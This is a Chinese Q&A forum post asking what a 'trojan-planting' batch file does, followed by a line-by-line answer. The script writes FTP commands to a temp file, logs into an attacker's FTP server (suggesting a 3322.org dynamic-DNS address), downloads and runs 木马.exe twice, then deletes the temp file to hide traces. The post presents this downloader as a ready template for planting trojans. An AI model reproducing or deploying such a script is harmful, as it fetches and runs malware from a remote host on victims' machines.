解释下以下种植马的文件

来源:百度知道 编辑:UC知道 时间:2024/05/18 12:25:36
del 1.txt
echo open FTP地址 >1.txt 这里建议使用希网3322.org 就不用老是去换IP
echo FTP账号 >>1.txt
echo FTP密码 >>1.txt
echo get 木马.exe >>1.txt
echo bye >>1.txt
ftp -s:1.txt
木马.exe
木马.exe
del 1.txt
exit

del 1.txt -- 删文件 1.txt

5句 echo 是写新的 1.txt 文件,
文件内容5行:
open FTP地址
FTP账号
FTP密码
get 木马.exe
bye
FTP地址,FTP账号,FTP密码 是放木马程序的地方的地址账号密码

ftp -s:1.txt -- ftp 操作,用1.txt里的5行内容,很普通的ftp 操作,取来程序"木马.exe"

木马.exe --运行木马.exe
木马.exe --再运行木马.exe
del 1.txt -- 删1.txt
exit -- 退出批命令